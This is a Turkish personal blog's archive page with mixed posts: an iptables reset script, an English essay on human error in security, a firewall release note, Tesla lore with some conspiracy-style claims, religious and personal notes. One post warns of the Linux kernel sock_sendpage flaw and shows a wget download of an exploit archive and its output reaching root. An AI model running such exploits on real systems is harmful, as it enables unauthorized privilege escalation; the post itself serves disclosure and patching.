Archive for the ‘ Genel ’ Category

Iptables'ı resetleme

Merhaba arkadaşlar büyük ihtimalle bir çok iptables kullanıcının başına gelmiştir sistemi kendi kullanımına kilitlemek. Bir çok kez benimde başıma geldi ve Cisco routerlarda gördüğüm bir özellik bana çok basit pratik bir fikri getirdi aklıma. O kodu tam hatırlamıyorum ama yapmış olduğunuz configurasyon dosyasını test etmeniz için bir  komut; Çalışan config dosyasını aktif ediyor ancak startup confige yazmıyor böylelikle sizin belirtiğiniz süre içinde reset atıp eski config dosyanıza geri dönmenizi sağlıyor. Hatırlayan olursa bi zahmet yazıversin bana :) Neyse konumuza geri dönelim kullandığımız script çok basit iptables’ı sıfırlıyor tabi cronjob a bunu atıyoruz çalışamaya başlamadan olurda kendimizi kilitlersek diye :)

#!/bin/bash
# Firewallumuzu olduğu gibi bırakmak için aşağıdaki durum değerini 0 bırakıyoruz.
# Firewallumuzu resetlemek istiyorsak durum degeri 1 olmalı ki döngüye girip firewallu sıfırlasın.

durum=1

# Centos Redhat ve Fedora sistemler dışındaki dağıtımlar için değerimiz "hayir" olucak
# Ben Centos kullandığım için benim değerim evet
sistem=evet

yol=/sbin/iptables

if [ "$durum" == "1" ];
then
if [ "$sistem" == "evet" ];
then
# Firewall'u durdurmak için
/etc/init.d/iptables stop
else
# Diğer linux distroları için aşağıdaki kodları kullanıyor.
$yol -F
$yol -X
$yol -Z
for tablo in $(/proc/net/ip_tables_names)
do
$yol -t $tablo -F
$yol -t $tablo -X
$yol -t $tablo -Z
done
$yol -P INPUT ACCEPT
$yol -P OUTPUT ACCEPT
$yol -P FORWARD ACCEPT

fi
else
:
fi
Çalıştırma izni için
chmod +x /root/sifirla.sh
Bu dosyamızı 5 dk da bir çalıştırmak için /etc/crontab altına
*/5 * * * * root /root/sifirla.sh satırını ekliyoruz.

Önemli nokta: Çalışmaya başlamadan önce yukarıdaki durumu dikkate alınız!!!

2010
05/21
DİZİN
Genel
TAGS


Yorum yazın

Human Factor on the Security System

The Problem with Technology and the Human Factor
Introduction

Some organizations see the solution to information security problems as a technical problem. Several suppliers propose the same idea with technical solutions. The technologies of the security manager are firewalls, antivirus software, PKI systems, and VPN. All of them are valuable and protecting their network. If technology is fallible like humans, the technology is equal to the person who knows how to use it.

Computer Security


Everyone should have security on their computers and networks. There are several shortcomings that view. Even the software can be perfect, it would still have problems from hacker, testers, viruses and software mistakes. They will find unchecked memory, backdoors, and other weaknesses in commercial and in-house developed software. The problem is multiplied by the complication of modern information technology systems. Organizations that use multi-layered security are going the right direction, but it is hard for every layer of protection to be perfect. Protection of the organizing systems needs intelligent users that do not create security bug for their systems.
Many organizations really don’t understand their information security problems. They do not have all the information to make sure that they know exactly the right technical solution to a problem. They recognize the need for standard information security software; however they rarely have basic information of requirements. They buy firewalls for protection only with no care to monitor security alarms, update attack signatures, or respond to new forms of network traffic. They scan emails for viruses but ignore JavaScript. For a good security you need to educate your workers about worms, spam mails viruses etc.

The term “Technical solution” brings high unrealistic expectations because technology requires the human keep it up to date. Custom-made security technology is extremely expensive, while standard cheap software is not as good and offer little advantage to custom-made security technology.  It puts creating the best technology out of the hands of the uneducated people, because the people are stuck with below standard technology when they do not know better. Last but not least, someone has to use this technology. This can bring big problems, because people can make mistakes.
Information Security is not much different from security in general. After all, no one would put heavy security on something not important.  For example, who would put a heavy security lock on a box if it only has something as unimportant as a rock? Also, if a car looks good but has a broken window, then the whole car is not safe, just like the information security. Protection against cyber attacks works on the same idea. All weak points should be secured whether on a desktop computer, an organization’s server, or a corporate network.  Information should also be entered through safe paths.

Human Factor on the Security System

There are a lot of security software in the world, for example there is firewalls, intrusion detection systems, anti viruses etc. All types of software designed are made to do a certain function. This software will help protect a system. However, even the best software cannot guarantee a hundred percent system security. Even with the most advanced technology and passwords cannot be a hundred percent safe. This is because people made the system and they can make mistakes. So, people are the weakest part of technology.

The human factor is the main reason why attacks on many computers and systems are successful. There are many great examples, hackers, virus writers, and dangerous users use the human factor to their advantage. Therefore, they use people to penetrate systems.

Some Examples about Security

Many people do not understand why using software with many weaknesses poses a security risk to their computer or system. The many computer users see their computer as an object. They want to use it as a washer, a microwave, or any other simple device. They don’t want to know how it works. Even if they do, they would not know how it works like other objects they use. They just think that if they install a system that protect against viruses and software without weaknesses, they’ll have nothing to worry about.

Not knowing the problems of threats is only part of the problem. The human factor also comes into play. Many bad code starts to show at the drafting stage, especially when they create security policies and procedures. The security of wireless networks is in a poor state. Many errors were made when wireless protocols were being made. There is much written about them having bad program errors. While programmers and testers continue to find bypass security, new exploits will be found. Even the most developed software will be used, but again the human factor will be there. If you have a poorly trained system administrator and user, the best firewall or other protection systems in the world will not protect your system.

The way users treat confidential information is a careless approach to security. A similar situation can be shown in everyday life. An example is a person leaving their keys on the door. A lot of systems use an empty or weak password. Some systems have the user’s name as the password just to access their system easily. Even when users use a complicated password which no one can think, they write their password on a paper or they forget it, therefore other users can find their passwords.

Another human sense which hackers use is that humans are curious. Many of us find email worms at some time in our life. We know that these worms arrive as attachments to infected messages. Sending the virus out is only having of what the virus writer has to do. The worm has to be activated to multiply through the system and to other computers. It could be activated by opening the attachment. You might think that users might become worried when seeing attachments to unexpected email.  But surprisingly, the hackers know how to use our curiosity.

It is interesting that people open unprotected e-mails even if they are not supposed to. However, the numbers of people who open the e-mails are always the same. This can be explained by the fact that virus writers find new ways to trick people. On the other hand, viruses do not only infect e-mail message, but you can also find them all over the internet.

Conclusion

Computers are becoming more common every day. Hacking is becoming more dangerous day to day. Hacking technologies is becoming more complex. Creating a good security system is not easy. There are many weak points in the system which is a never-ending process to protect. There is always new technology being developed. They are use to solve problems. They have their disadvantages too. Hackers, virus writers, dangerous users invent new ways to exploit the security software being used. The result is a war between cyber criminals and security professionals.  It does not matter if you have the best security product or a professional security engineer, technology is only as good with users that know what they are doing.

Ali Kapucu

2010
05/11
DİZİN
Genel
TAGS

Yorum yazın

m0n0wall 1.31 yayınlandı

m0n0wall , FreeBSD tabanlı gelişmiş bir güvenlik duvarı.Manuel Kasper tarafından, m0n0wall 1.31 sürümünü yayımlandı.

Bu sürümdeki yeniliklerin/değişikliklerin hızlı bir özeti;

  • various IPv6 improvements (in DNS forwarder, DHCPv6, AYIYA, etc.)
  • bridge “disable spoof check” option (for non-m0n0wall DHCP and multicast)
  • fans/temperature monitoring on status page for supported platforms (unfortunately Soekris/PC Engines not included
  • fix for OpenSSL session renegotiation vulnerability (-> HTTPS webGUI)
  • patch to DHCP server daemon to reduce lease file growth

Download ve Changelogm0n0wall website

2010
03/13
DİZİN
Genel
TAGS

Yorum yazın

Linux Kernel Yamalama Zamanı ve Root Olun..

Linux kernel 2.4.X ve 2.6.X sürümlerini etkileyen sifir gun acigi yayinlandi(Linux Kernel ’sock_sendpage()’ NULL Pointer Dereference Vulnerability). Özellikle sunucularında shell hesapları veren sistem adminlerinin bu açığı gidermeleri en acilinden gerekmekte..

http://www.securityfocus.com/bid/36038/info da data detaylı bilgi bulabilirsiniz!!!

Huzeyfe Onal ın yaptığı test
Exploit kullanmadan onceki kullanici haklari.
$ id
uid=1001(huzeyfe) gid=1001(huzeyfe) groups=1001(huzeyfe)

Exploitin kullanimi

# wget http://www.grsecurity.net/~spender/exploitx.tgz
huzeyfe@guvenlis:/tmp$ cd exploitx
huzeyfe@guvenlis:/tmp/exploitx$ ls
exploit.c pwnkernel.c tzameti.avi wunderbar_emporium.sh
huzeyfe@guvenlikod:/tmp/wunderbar_emporium$ ./exploitx.sh
[+] Personality set to: PER_SVR4
E: x11wrap.c: XOpenDisplay() failed
E: module.c: Failed to load module “module-x11-publish” (argument: “”): initialization failed.
[+] MAPPED ZERO PAGE!
[+] Resolved selinux_enforcing to 0xc05b4b7c
[+] Resolved selinux_enabled to 0xc05b4b78
[+] Resolved apparmor_enabled to 0xc04798a4
[+] Resolved apparmor_complain to 0xc05b6770
[+] Resolved apparmor_audit to 0xc05b6778
[+] Resolved apparmor_logsyscall to 0xc05b677c
[+] Resolved security_ops to 0xc05b3324
[+] Resolved default_security_ops to 0xc0478640
[+] Resolved sel_read_enforce to 0xc021fa60
[+] Resolved audit_enabled to 0xc0574544
[+] got ring0!
[+] detected 2.6 style 8k stacks
[+] Disabled security of : LSM
[+] Got root!
#
# id
uid=0(root) gid=0(root) groups=1001(huzeyfe)

2009
08/18
DİZİN
Genel
TAGS

Yorum yazın

Korumalı: İşte Burada

Bu yazı parola korumalı. Yazıyı görmek için parolanızı girin:


2009
08/05
DİZİN
Genel
Yorumları görmek için parolanızı girin.

Yaşıyorum!!!

Merhabalar bildiğinzi gibi uzun süredir yazamıyorum sanmayın ki Bu blog benim için bir hevesti!!

Bu aralar neler yaptığıma gelince; İstanbul’daki yaşantıma son verdim Amerika hazırlıklarım devam ediyor. Kafa dinliyorum ve Yeni hayatıma (tamamen) hazırlık yapıyorum.. Yakında Görüşmek Üzere.

2009
07/26
DİZİN
Genel
Yorum yazın

Nikola Tesla Ve Gerçekler

Simdi bircogunuzun bu da kim dedigini duyar gibiyim hatta ve hatta bilimsel gelismelerle yakindan ilgili bircok kisi icin dahi ismi cok az gecen bir bilim adami Nikola Tesla… Size biraz ondan bahsetmek istiyorum. Kimdir bu adam? Ne yapmis, bilimseler calismalari neler, bir dahi mi yoksa dikkate alinmamasi gereken tarihin derinliklerinde kaybolmasi gereken bir bilim adami mi? Burada anlatmamizin asil sebebi ne, bilimsel sahsiyetinin onemi mi yoksa kiyamet senaryolarinin nasil gerceklestigini anlamamizi saglayacak kisi mi?

Tesla, 9 Haziran 1856 yilinda Arnavutlukta dogmus Sirp asilli bir bilim adami. Hayati tamamen mucadele ve bilim alanina yeni seyler katmakla gecmis. Fakat 7 Ocak 1943 yilinda patenti kendisine ait olan tam 700 bulusla tarihe gecmis olan TESLA bir otel odasinda yalniz basina bes parasiz olarak olmustur… Hatta ve hatta oldukten sonra dahi bilim alaninda yaptigi onca bulusa ragmen ne hikmetse gizli bir el tarafindan adi ve calismalari ders kitaplarindan bile silinmeye calisilmistir…

Ancak o siradan bir bilim adami degil bugun halen gunumuzde bir cok alanda hatta ve hatta kimine gore elektrik ve elektronik cagi kimine gore de uzay cagi dedikleri gunumuzde halen onun buluslarindan yararlanmakta ve hergun onun bilimsel olarak ifade ettiklerini gunumuzde “cok gizli” ibaresi altinda bir cok devlet arastirip-gelistirmekte daha dogru bir ifadeyle onun insanligin hizmeti icin kullanilmak amaciyla yaptiklarini kendi amaclari icin kullanmaktalar…

TESLA`NIN BULUSLARI

AC Akim Jenaratorleri ve Motorlari, Radyo, Florasan, Radar, MRI, Laser Teknolojisi, Robot Teknolojisi, Deprem Makinasi ve daha niceleri aslinda bu bilimi adami sayesinde gunumuzde kullanilabilmekte.

Sirp asilli olan bu dahi bilim adami aslinda bir elektrik muhendisi ve gunumuzde kullanilan AC motorlari ve akim jenaratorlerinin muciti. Tesla ilk olarak Graz Universitesi`nde fizik ve matematik uzerine calismaya baslamis daha sonra Prag Universitesi`nde felsefe egitimi almistir. Macaristan`da ve degisik Avrupa ulkelerinde elektrik muhendisi olarak calismis ancak buluslarinin anlasilmamasi uzerine 1884 yilinda Amerika Birlesik Devletlerine gelerek calismalarini burada surdurmustur… Kisa bir donem Edisonla da calisan Tesla burada kendisini hazmedemeyen Edison tarafindan bir dusman ilan edilmistir… Daha sonra calismalarina degisik kisi ve kuruluslarca destek verilmesiyle hiz veren Tesla Niagara`da bulunan ve halen faaliyette olan ana enerji santralinin kurucusudur… Gunumuz elektrik santrallerinin ilk kurucusu Tesladir ve hala dunya onun sistemiyle aydinlatilmakta yani AC Akim Jenaratorleri ile…
Devamını okuyun

2009
07/10
DİZİN
Genel
2 yorum

Regâib Kandiliniz Mübarek Olsun..

Üç ayların ilk cuma gecesi olan bu gece, Allah’a çokça yalvarmak, yakarmak, dua etmek ve af dilemek için bir vesile ve fırsattır.
Bu gecede Yüce Allah’ın rahmet, bağış ve yardımlarının dağıtıldığı müjdelenmiştir. Hz. Muhammed (sas)’in Receb’in ilk perşembe gününü oruçla geçirdiği ve cuma gecesinde, bu kandil gecesine mahsus olmak üzere 12 rekât namaz kıldığı ifade edilir.

Regâib ne anlama geliyor?
Regâib, Arapça bir kelimedir ve “reğabe” kökünden gelmektedir. “reğabe”, kelime olarak, herhangi bir şeyi istemek, arzulamak, ona karşı meyletmek ve onu elde etmek için çaba sarf etmek demektir. “reğîb” kelimesi ise, “reğabe”den türemiş olan bir isimdir ve kendisine rağbet edilen, arzulanan, taleb edilen şey demektir. “Reğîbe”nin çoğulu da “reğâib” dir. Bu gece Peygamberimiz’in ana rahmine düştüğü yönünde rivayetler vardır ancak ilmi dayanağı yoktur.

Üç ayları nasıl değerlendirebiliriz?
* Nafile oruçlarla
Pazartesi-perşembe oruçlarını gücümüz yettiğince tutabiliriz. Yapamıyorsak, “dilimize, gözümüze ve kulağımıza” günah orucu tutturabiliriz!
* Nafile namazlarla
Evvabin, duha namazı, teheccüt namazı vb. kılarak. Ya da kazaya kalmış namazlarımız varsa her namazın sonuna bir adet ekleyip kaza ederek…
* Hayır ve hasenatla
Kişinin tebessümü bile sadaka hükmündedir. Herşeyi hayra yormak, işin oluruna gitmek, müslümanlar arasındaki işleri hal yoluna koymaya çalışmak, dargınları barıştırmaya, küskünleri ısındırmaya çalışmak hayır ve hasenat hükmündedir. Hele bir de maddi imkanınız varsa bu daha çok sevap kazanma imkanı verir Müslüman’a. Bazı mübarek vakitlerde Kur’an’ın normalde 1’e 10 olan sevabı, 1’e 700 bine kadar çıkabilmektedir. Yine sadaka ve zekatların sevapları da öyledir. Müslümanlar bundan mahrum kalmamak için mesela zekatlarını Ramazan’ın en mübarek vakitlerinde vermeye gayret ederler.

Kandillerin Tarihçesi
Kandil, Rabb’imizin ve Resûlü’nün mübarek saydığı gecelere verilen isimdir. Bu geceler Ramazan’ın yirmi yedinci gecesi olan Kadir, Receb ayının yirmi yedinci gecesi olan Mirac, Şaban ayının on beşinci gecesi olan Berat, Receb ayının ilk cuma gecesi olan Regaib ve Rebiülevvel ayının on ikinci gecesi olan Mevlid’dir. Osmanlılar döneminde, II. Selim zamanından başlayarak minarelerde kandiller yakılarak duyurulduğu ve kutlandığı için kandil olarak anılmaya başlayan gecelere Kandil-i Şerif de denir. Ayrıca her gece, Leyle-i Kadir, Leyle-i Mirac gibi terkiplerle de anılır. Hicretten üç yüz yıl sonra ilk kez Mısır’da, Fatimiler döneminde Mevlid; dört yüzyıl sonra da Kudüs’te Mirac, Regaib ve Berat geceleri ihya edilmeye, bu geceler camilerde cemaatle yapılan ibadetlerle yaşatılmaya başlandı. Daha sonra bu kutlamalar gelenekleşti. Yüzyıllardır kandiller camilerde okunan mevlid ve Kur’an’la yapılan dua ve ibadetlerle canlı biçimde kutlanmaktadır.

2009
06/25
DİZİN
Genel
Yorum yazın

Şirketlerin gözdesi beyaz hackerlar!

Teknoloji geliştikçe 7′den 70′e her yaştan insan, büyük küçük tüm firmalar internete bağımlı hale geldi. Özellikle firmalar için ise internet artık iş hayatının ayrılmaz bir parçası. Haberleşmeden, iş takiplerine ve ödemelere kadar tüm iş akışları internet sayesinde kolaylaştı… Ancak madalyonun öbür yüzünde ise bu gelişmenin yarattığı tehditler var: Hacker’lar ve virüsler… Sanal dünyadan gelecek bir saldırı ile şirketin tüm gizli bilgilerinin ele geçirilmesi ya da bilgilerin uçması an meselesi.

İşte bu tehdit hacker’ları şirketlerin kadrolu elemanı yaptı. Ama bu hacker’ların saldırıyı gerçekleştiren hacker’lardan önemli bir farkı var.

İsimleri “beyaz şapkalı hacker”, işleri ise hacker’lara karşı savaşmak. Beyaz şapkalı hacker’lar, “siyah şapkalı” meslektaşları kadar yetenekli. Kendi sitelerine saldırarak güvenlik açıklarını tespit edip ona göre pozisyon alan beyaz şapkalı hacker’lara olan talep eğitim kurumlarını da harekete geçirdi. Eğitim kurumlarından son bir yılda 5 bin kişi hacker’lık eğitimi aldı. Eğitim alan hacker’lar 6 bin TL’den başlayan maaşlara iş bulabiliyor.

Gizliliğin önemi artıyor

Eğitim veren firmalardan biri internetin daha güvenli bir ortama dönüşmesini isteyen ve e-ticaret yapan global dev şirketlerin bir araya gelip oluşturdukları bir kurum olan EC-Council’ın Türkiye Ana Distribütörü Academytech. Şirket, son bir yılda 300′ü aşkın şirketin 800′e yakın bilgi güvenliği uzmanına ve bini aşkın bireysel katılımcıya beyaz hacker’lık eğitimi verdi.

Academytech Genel Müdürü Özcan Yıldız, ABD ordusu, FBI, Microsoft, IBM ve Birleşmiş Milletler çalışanlarına eğitim veren ve beyaz hacker’lık alanında referans kurum olan EC-Council’ın sertifikaları sayesinde eğitim verdikleri beyaz hacker’ların tüm dünyada bilgi güvenliği alanında kolayca iş bulabildiklerini söylüyor. Eğitim verdikleri bin 800 kişinin yanı sıra, üniversite ve kurumlarda yaptıkları seminerlere yaklaşık 3 bin kişinin katıldığını kaydeden Yıldız, “İnternet geliştikçe, hem kişisel hem de kurumsal bilgilerin gizliliğine daha çok ilgi göstermemiz gerekiyor. Milyar dolarlık ciro yapan bir şirketin internet üzerinden yaptığı ticarette yaşadığı kötü bir deneyim onun itibarını bitirmeye yetebilir. Bankalar gibi işlemlerinin çoğunu internet sitelerinden yapan kurumlar için bu çok daha önemli. Türkiye’de de hem teknolojinin hem de e-ticaretin gelişmesiyle beyaz hacker’lar daha çok iş buluyor, dönemsel çalışmak yerine şirketlerin bilgi güvenliği departmanına dahil oluyorlar. Bir kısım öğrencimiz de bu sertifikayı alıp bilişim departmanlarında iş bulmayı kolaylaştırıyor” diyor. Academytech’te 30 saatlik beyaz hacker’lık eğitimlerinin tutarı bin dolar civarında.

15 bin illegal hacker var

Türkiye’nin en genç beyaz hacker eğitmenlerinden 27 yaşındaki Huzeyfe Onal, bugüne kadar 200′den fazla şirkete güvenlik hizmeti vermiş. 2003′ten beri Ford Otosan, Avea, Vodafone ve Turkcell’de bilgi güvenliği alanında çalışan Onal, Türkiye’de hacker’lık eğitimi verebilecek 30 civarında eğitmenin bulunduğunu söylüyor.

Onal, “Eskiden büyük şirketler güvenlik denetimlerini yurtdışına yaptırırlardı. Yurtdışından bir uzmanın bir günlüğü 2 bin dolar. Şimdi Türk eğitmenler 1 haftalık denetimleri 2 bin dolara yapıyor. Bilgi güvenliği ihtiyacı arttıkça uzman da gerekiyor. Şirketlerin bilgi güvenliği departmanında çalışan ortalama bir etik hackerın maaşı ortalama 6-7 bin liradan başlıyor” diyor. 5 yıl önce Türkiye’nin en büyük şirketlerinin bile bünyelerinde 1 veya 2 internet güvenliği çalışanı istihdam ettiğini belirten Onal, “Bu gün o şirketlerin 15-20 kişilik bilgi güvenliği departmanları bulunuyor” diye konuşuyor.

Türkiye’de onlarca hacker grubu var. Çoğu genç olan bu hacker’lar şirket sitelerine saldırmaktan öte siyasi veya “keyfi” saldırılar yapıyor. Huzeyfe Onal, bu forumlara üye olan hacker veya aday hacker sayısının 15 bine yakın olduğunu söylüyor. İllegal hacker’larda büyük potansiyel bulunduğunu belirten Onal, “İllegaller değerlendirilebilse Türkiye internet güvenliğinde bir adım daha güçlenir. İllegalde deneyim kazanıp şirketlerde çalışmak isteyen hacker’lar da oluyor. Ama güvenlikçi adam güvenilir olmalı. ‘Bu adam daha önce yapmış, benim şirketime de yapabilir’ diyerek bu hackerlar işe alınmıyor. Biz de işi daha ‘beyaz’ alana çekmek için zararsız hack’leme yarışmaları, kongreleri yapıyoruz” diyor.

Banka hacker’sız çalışmıyor

Devamını okuyun

2009
06/22
DİZİN
Genel
TAGS


Yorum yazın

Geliyorlar!!!

Arkadaşlar Finallerin bitmesiyle birlikte siteye yüklenme başlıyacak.. Linux Sunucu Güvenliği ile ilgili bi yazı dizisi ardından yada arada çerez niyetine :) “https” ile bağlanılan bir sunucuya giden datalarn okunması vs vs vs.. Bekleyelim görelim.. Güvenliğin dibine vurucaz..

2009
06/14
DİZİN
Genel
Yorum yazın